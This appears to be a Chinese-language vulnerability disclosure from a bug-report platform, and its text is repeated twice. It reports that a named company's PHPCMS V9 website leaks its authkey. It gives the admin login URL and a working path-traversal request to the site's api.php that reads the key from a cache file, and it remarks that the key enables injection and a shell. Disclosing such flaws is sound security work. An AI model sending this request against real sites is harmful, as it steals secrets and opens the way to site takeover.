### 简要描述: 用友政务官方网站存在漏洞导致authkey泄露 ### 详细说明: 同学在用友政务工作,闲着没事看了看他们的官方网站,顺便手贱摸了一下·· ``` http://www.yonyougov.com/index.php?m=admin&c=index&a=login&pc_hash= ``` PHPCMS V9的系统 authkey很重要,可注射拿shell ``` http://www.yonyougov.com/api.php?op=get_menu&act=ajax_getlist&callback=aaaaa&parentid=0&key=authkey&cachefile=..\..\..\phpsso_server\caches\caches_admin\caches_data\applist&path=admin ``` [<img src="https://images.seebug.org/upload/201507/101338263f5290497697b4ed390469300c7ec650.png" alt="1.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201507/101338263f5290497697b4ed390469300c7ec650.png) ### 漏洞证明: [<img src="https://images.seebug.org/upload/201507/101338263f5290497697b4ed390469300c7ec650.png" alt="1.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201507/101338263f5290497697b4ed390469300c7ec650.png)
### 简要描述: 用友政务官方网站存在漏洞导致authkey泄露 ### 详细说明: 同学在用友政务工作,闲着没事看了看他们的官方网站,顺便手贱摸了一下·· ``` http://www.yonyougov.com/index.php?m=admin&c=index&a=login&pc_hash= ``` PHPCMS V9的系统 authkey很重要,可注射拿shell ``` http://www.yonyougov.com/api.php?op=get_menu&act=ajax_getlist&callback=aaaaa&parentid=0&key=authkey&cachefile=..\..\..\phpsso_server\caches\caches_admin\caches_data\applist&path=admin ``` [<img src="https://images.seebug.org/upload/201507/101338263f5290497697b4ed390469300c7ec650.png" alt="1.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201507/101338263f5290497697b4ed390469300c7ec650.png) ### 漏洞证明: [<img src="https://images.seebug.org/upload/201507/101338263f5290497697b4ed390469300c7ec650.png" alt="1.png" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201507/101338263f5290497697b4ed390469300c7ec650.png)